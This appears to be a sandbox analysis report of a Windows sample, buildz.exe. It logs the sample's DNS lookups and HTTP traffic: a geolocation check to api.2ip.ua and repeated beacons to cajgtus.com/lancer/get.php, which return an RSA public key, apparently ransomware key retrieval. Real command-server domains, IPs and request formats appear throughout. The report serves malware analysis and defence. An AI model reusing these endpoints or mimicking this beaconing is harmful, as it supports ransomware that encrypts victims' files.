                        Oct 5, 2024 16:26:46.620229959 CEST49858443192.168.2.5188.114.97.3
                        Oct 5, 2024 16:26:46.620254040 CEST44349858188.114.97.3192.168.2.5
                        Oct 5, 2024 16:26:47.148828983 CEST4986980192.168.2.5190.219.117.240
                        Oct 5, 2024 16:26:47.153722048 CEST8049869190.219.117.240192.168.2.5
                        Oct 5, 2024 16:26:47.153805017 CEST4986980192.168.2.5190.219.117.240
                        Oct 5, 2024 16:26:47.153956890 CEST4986980192.168.2.5190.219.117.240
                        Oct 5, 2024 16:26:47.158787966 CEST8049869190.219.117.240192.168.2.5
                        Oct 5, 2024 16:26:48.167062044 CEST8049869190.219.117.240192.168.2.5
                        Oct 5, 2024 16:26:48.167151928 CEST4986980192.168.2.5190.219.117.240
                        Oct 5, 2024 16:26:48.174875975 CEST8049869190.219.117.240192.168.2.5
                        Oct 5, 2024 16:26:48.174933910 CEST4986980192.168.2.5190.219.117.240
                        Oct 5, 2024 16:26:48.508471966 CEST4986980192.168.2.5190.219.117.240
                        Oct 5, 2024 16:26:48.513318062 CEST8049869190.219.117.240192.168.2.5
                        TimestampSource PortDest PortSource IPDest IP
                        Oct 5, 2024 16:26:02.883362055 CEST5129153192.168.2.51.1.1.1
                        Oct 5, 2024 16:26:02.892708063 CEST53512911.1.1.1192.168.2.5
                        Oct 5, 2024 16:26:13.465239048 CEST5308353192.168.2.51.1.1.1
                        Oct 5, 2024 16:26:14.467494011 CEST5308353192.168.2.51.1.1.1
                        Oct 5, 2024 16:26:15.735793114 CEST5308353192.168.2.51.1.1.1
                        Oct 5, 2024 16:26:15.894223928 CEST53530831.1.1.1192.168.2.5
                        Oct 5, 2024 16:26:15.894244909 CEST53530831.1.1.1192.168.2.5
                        Oct 5, 2024 16:26:15.894359112 CEST53530831.1.1.1192.168.2.5
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Oct 5, 2024 16:26:02.883362055 CEST192.168.2.51.1.1.10x888aStandard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:13.465239048 CEST192.168.2.51.1.1.10xfd10Standard query (0)cajgtus.comA (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:14.467494011 CEST192.168.2.51.1.1.10xfd10Standard query (0)cajgtus.comA (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.735793114 CEST192.168.2.51.1.1.10xfd10Standard query (0)cajgtus.comA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Oct 5, 2024 16:26:02.892708063 CEST1.1.1.1192.168.2.50x888aNo error (0)api.2ip.ua188.114.97.3A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:02.892708063 CEST1.1.1.1192.168.2.50x888aNo error (0)api.2ip.ua188.114.96.3A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894223928 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com190.219.117.240A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894223928 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com105.197.97.247A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894223928 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com109.175.29.39A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894223928 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com190.13.174.94A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894223928 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com189.161.95.103A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894223928 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com177.129.90.106A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894223928 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com185.18.245.58A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894223928 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com186.145.236.225A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894223928 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com92.36.226.66A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894223928 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com185.12.79.25A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894244909 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com190.219.117.240A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894244909 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com105.197.97.247A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894244909 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com109.175.29.39A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894244909 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com190.13.174.94A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894244909 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com189.161.95.103A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894244909 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com177.129.90.106A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894244909 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com185.18.245.58A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894244909 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com186.145.236.225A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894244909 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com92.36.226.66A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894244909 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com185.12.79.25A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894359112 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com190.219.117.240A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894359112 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com105.197.97.247A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894359112 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com109.175.29.39A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894359112 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com190.13.174.94A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894359112 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com189.161.95.103A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894359112 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com177.129.90.106A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894359112 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com185.18.245.58A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894359112 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com186.145.236.225A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894359112 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com92.36.226.66A (IP address)IN (0x0001)false
                        Oct 5, 2024 16:26:15.894359112 CEST1.1.1.1192.168.2.50xfd10No error (0)cajgtus.com185.12.79.25A (IP address)IN (0x0001)false
                        • api.2ip.ua
                        • cajgtus.com
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.549711190.219.117.24080432C:\Users\user\Desktop\buildz.exe
                        TimestampBytes transferredDirectionData
                        Oct 5, 2024 16:26:15.966355085 CEST140OUTGET /lancer/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true HTTP/1.1
                        User-Agent: Microsoft Internet Explorer
                        Host: cajgtus.com
                        Oct 5, 2024 16:26:16.993844986 CEST767INHTTP/1.1 200 OK
                        Date: Sat, 05 Oct 2024 14:26:24 GMT
                        Server: Apache/2.4.37 (Win64) PHP/5.6.40
                        X-Powered-By: PHP/5.6.40
                        Content-Length: 563
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 75 39 61 2b 33 39 4b 76 78 4c 73 59 50 72 76 36 6c 4b 67 6f 5c 5c 6e 78 34 5c 2f 63 32 72 4d 33 72 6d 35 6c 78 35 5c 2f 4a 5c 2f 4b 67 31 78 6f 77 74 73 53 32 32 62 49 32 72 6c 6b 49 50 44 58 65 67 37 35 44 74 6c 2b 33 5c 2f 38 55 39 6a 6a 47 67 6d 5c 2f 4b 59 6b 66 51 39 56 5c 5c 6e 51 4d 71 44 65 46 43 68 78 71 45 54 57 4f 66 4b 43 43 74 58 73 41 6b 36 69 6e 46 4f 38 54 79 68 33 4c 48 75 54 6f 31 32 30 50 72 68 5a 48 36 42 5a 41 62 4e 4a 6f 76 43 42 37 6e 57 53 34 71 79 5c 5c 6e 66 66 61 33 50 32 52 36 57 77 58 50 33 55 4c 38 6e 56 66 68 30 76 5c 2f 57 76 53 32 45 69 49 46 6f 65 75 72 4b 35 70 45 49 59 35 36 54 37 53 58 62 5c 2f 4d 33 58 76 45 37 6a 79 31 42 65 6e 70 75 42 5c 5c 6e 66 50 75 4e 36 79 38 32 51 [TRUNCATED]
                        Data Ascii: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9a+39KvxLsYPrv6lKgo\\nx4\/c2rM3rm5lx5\/J\/Kg1xowtsS22bI2rlkIPDXeg75Dtl+3\/8U9jjGgm\/KYkfQ9V\\nQMqDeFChxqETWOfKCCtXsAk6inFO8Tyh3LHuTo120PrhZH6BZAbNJovCB7nWS4qy\\nffa3P2R6WwXP3UL8nVfh0v\/WvS2EiIFoeurK5pEIY56T7SXb\/M3XvE7jy1BenpuB\\nfPuN6y82QtpDmZ+8a9lM\/wFeoSVyFk0MBVjyaMb9HQSX9iL8LVDQYNoOW6OmwEzu\\nK5ckQEl8LQYfQTR17DG0fdvwXpopOF\/1rgAZ31bi5Meoj8UIaCGYbsarvqPS60G0\\n8QIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz"}


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.549869190.219.117.240804708C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe
                        TimestampBytes transferredDirectionData
                        Oct 5, 2024 16:26:47.153956890 CEST129OUTGET /lancer/get.php?pid=903E7F261711F85395E5CEFBF4173C54 HTTP/1.1
                        User-Agent: Microsoft Internet Explorer
                        Host: cajgtus.com
                        Oct 5, 2024 16:26:48.167062044 CEST767INHTTP/1.1 200 OK
                        Date: Sat, 05 Oct 2024 14:26:55 GMT
                        Server: Apache/2.4.37 (Win64) PHP/5.6.40
                        X-Powered-By: PHP/5.6.40
                        Content-Length: 563
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 75 39 61 2b 33 39 4b 76 78 4c 73 59 50 72 76 36 6c 4b 67 6f 5c 5c 6e 78 34 5c 2f 63 32 72 4d 33 72 6d 35 6c 78 35 5c 2f 4a 5c 2f 4b 67 31 78 6f 77 74 73 53 32 32 62 49 32 72 6c 6b 49 50 44 58 65 67 37 35 44 74 6c 2b 33 5c 2f 38 55 39 6a 6a 47 67 6d 5c 2f 4b 59 6b 66 51 39 56 5c 5c 6e 51 4d 71 44 65 46 43 68 78 71 45 54 57 4f 66 4b 43 43 74 58 73 41 6b 36 69 6e 46 4f 38 54 79 68 33 4c 48 75 54 6f 31 32 30 50 72 68 5a 48 36 42 5a 41 62 4e 4a 6f 76 43 42 37 6e 57 53 34 71 79 5c 5c 6e 66 66 61 33 50 32 52 36 57 77 58 50 33 55 4c 38 6e 56 66 68 30 76 5c 2f 57 76 53 32 45 69 49 46 6f 65 75 72 4b 35 70 45 49 59 35 36 54 37 53 58 62 5c 2f 4d 33 58 76 45 37 6a 79 31 42 65 6e 70 75 42 5c 5c 6e 66 50 75 4e 36 79 38 32 51 [TRUNCATED]
                        Data Ascii: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9a+39KvxLsYPrv6lKgo\\nx4\/c2rM3rm5lx5\/J\/Kg1xowtsS22bI2rlkIPDXeg75Dtl+3\/8U9jjGgm\/KYkfQ9V\\nQMqDeFChxqETWOfKCCtXsAk6inFO8Tyh3LHuTo120PrhZH6BZAbNJovCB7nWS4qy\\nffa3P2R6WwXP3UL8nVfh0v\/WvS2EiIFoeurK5pEIY56T7SXb\/M3XvE7jy1BenpuB\\nfPuN6y82QtpDmZ+8a9lM\/wFeoSVyFk0MBVjyaMb9HQSX9iL8LVDQYNoOW6OmwEzu\\nK5ckQEl8LQYfQTR17DG0fdvwXpopOF\/1rgAZ31bi5Meoj8UIaCGYbsarvqPS60G0\\n8QIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz"}


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.549704188.114.97.34435272C:\Users\user\Desktop\buildz.exe
                        TimestampBytes transferredDirectionData
                        2024-10-05 14:26:03 UTC85OUTGET /geo.json HTTP/1.1
                        User-Agent: Microsoft Internet Explorer
                        Host: api.2ip.ua
                        2024-10-05 14:26:04 UTC859INHTTP/1.1 200 OK
                        Date: Sat, 05 Oct 2024 14:26:03 GMT
                        Content-Type: application/json
                        Transfer-Encoding: chunked
                        Connection: close
                        strict-transport-security: max-age=63072000; preload
                        x-frame-options: SAMEORIGIN
                        x-content-type-options: nosniff
                        x-xss-protection: 1; mode=block; report=...
                        access-control-allow-origin: *
                        access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                        access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                        cf-cache-status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SxfCph1RuuTdR7KRxUeLWFWI1519FlOtrSv5RXmDuq1mIg%2BPvWzvwpXkWIud1XBh0TqeVJK43OR4tT2OvH1iQgrfLBUlb68T7cO1D%2FhhhmocC%2B7Ta81lohhy4vtv"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8cde15a4196f176c-EWR
                        2024-10-05 14:26:04 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
                        Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
                        2024-10-05 14:26:04 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.549705188.114.97.3443432C:\Users\user\Desktop\buildz.exe
                        TimestampBytes transferredDirectionData
                        2024-10-05 14:26:13 UTC85OUTGET /geo.json HTTP/1.1
                        User-Agent: Microsoft Internet Explorer
                        Host: api.2ip.ua
                        2024-10-05 14:26:13 UTC857INHTTP/1.1 200 OK
                        Date: Sat, 05 Oct 2024 14:26:13 GMT
                        Content-Type: application/json
                        Transfer-Encoding: chunked
                        Connection: close
                        strict-transport-security: max-age=63072000; preload
                        x-frame-options: SAMEORIGIN
                        x-content-type-options: nosniff
                        x-xss-protection: 1; mode=block; report=...
                        access-control-allow-origin: *
                        access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                        access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q2RihAvHlobdgLeVaTOLO3Y03KbIked3dGHJvkd7OS5tc%2BeRCN7AE%2B1tLIUYxtIGdYgbgafArWss5rg4QZ753CqHSiP2xA2EqMbzCvRNS6hV76oZwN1S0Dgw0Qtt"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8cde15dfbf830ce5-EWR
                        2024-10-05 14:26:13 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
                        Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
                        2024-10-05 14:26:13 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.549751188.114.97.34436848C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe
                        TimestampBytes transferredDirectionData
                        2024-10-05 14:26:25 UTC85OUTGET /geo.json HTTP/1.1
                        User-Agent: Microsoft Internet Explorer
                        Host: api.2ip.ua
                        2024-10-05 14:26:25 UTC869INHTTP/1.1 200 OK
                        Date: Sat, 05 Oct 2024 14:26:25 GMT
                        Content-Type: application/json
                        Transfer-Encoding: chunked
                        Connection: close
                        strict-transport-security: max-age=63072000; preload
                        x-frame-options: SAMEORIGIN
                        x-content-type-options: nosniff
                        x-xss-protection: 1; mode=block; report=...
                        access-control-allow-origin: *
                        access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                        access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BQuMvlL2xRhEvusnc3cwbgKrJN0bpdvsLgjJiZUBKhfxwvyRctHteFgE24pzEMG4eg1pP%2BYSMvoz%2FWd%2Fr9DD%2FMb3j%2FwMUpQ6%2B3nKG9Q1YtySLr5hlClch%2FLONolZ"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8cde162abebc0f39-EWR
                        2024-10-05 14:26:25 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
                        Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
                        2024-10-05 14:26:25 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.549797188.114.97.34432148C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe
                        TimestampBytes transferredDirectionData
                        2024-10-05 14:26:36 UTC85OUTGET /geo.json HTTP/1.1
                        User-Agent: Microsoft Internet Explorer
                        Host: api.2ip.ua
                        2024-10-05 14:26:36 UTC867INHTTP/1.1 200 OK
                        Date: Sat, 05 Oct 2024 14:26:36 GMT
                        Content-Type: application/json
                        Transfer-Encoding: chunked
                        Connection: close
                        strict-transport-security: max-age=63072000; preload
                        x-frame-options: SAMEORIGIN
                        x-content-type-options: nosniff
                        x-xss-protection: 1; mode=block; report=...
                        access-control-allow-origin: *
                        access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                        access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                        cf-cache-status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sf2hHPFiRcVVT5fjSPl7bl%2F375clJpwE1Vf6OUoqmn%2B%2B0%2Fp5paouXcuuwVJWwK%2Fcusk%2B7x3OROrL1Cy34yKdfbknE9UgxbJZhFY8eoEK%2BcYjXZjD2NY6PabHYP4b"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8cde16706bcf4303-EWR
                        2024-10-05 14:26:36 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
                        Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
                        2024-10-05 14:26:36 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.549858188.114.97.34434708C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe
                        TimestampBytes transferredDirectionData
                        2024-10-05 14:26:46 UTC85OUTGET /geo.json HTTP/1.1
                        User-Agent: Microsoft Internet Explorer
                        Host: api.2ip.ua
                        2024-10-05 14:26:46 UTC861INHTTP/1.1 200 OK
                        Date: Sat, 05 Oct 2024 14:26:46 GMT
                        Content-Type: application/json
                        Transfer-Encoding: chunked
                        Connection: close
                        strict-transport-security: max-age=63072000; preload
                        x-frame-options: SAMEORIGIN
                        x-content-type-options: nosniff
                        x-xss-protection: 1; mode=block; report=...
                        access-control-allow-origin: *
                        access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                        access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                        cf-cache-status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TfU2sce%2FNQWeQ%2BEbbXEguFJJsaBgADeP4roXP%2FRwE5DBgzXI9BhAdE7J0udgmIt9CFRNJdW1sLIW6ViD1secgsMN1xfnKURZ2dsAKf14rpONUNsTR%2Bb6AQDMeQc7"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8cde16af8f117cfc-EWR
                        2024-10-05 14:26:46 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
                        Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
                        2024-10-05 14:26:46 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:10:25:55
                        Start date:05/10/2024
                        Path:C:\Users\user\Desktop\buildz.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\buildz.exe"
                        Imagebase:0x400000
                        File size:726'528 bytes
                        MD5 hash:B7CB7F2B5CD9BD047710650295DC88F7
